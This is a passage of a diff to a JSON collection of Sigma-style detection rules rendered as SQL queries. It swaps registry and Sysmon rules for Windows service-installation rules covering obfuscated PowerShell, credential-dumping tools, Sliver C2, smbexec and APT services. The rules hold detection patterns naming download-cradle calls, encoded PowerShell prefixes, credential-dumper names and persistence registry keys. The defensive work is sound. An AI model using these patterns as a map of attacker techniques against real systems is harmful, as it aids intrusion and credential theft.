'\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE 
'\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath 
LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": 
"eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": 
"Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server 
Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = 
'7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of 
process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to 
open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", 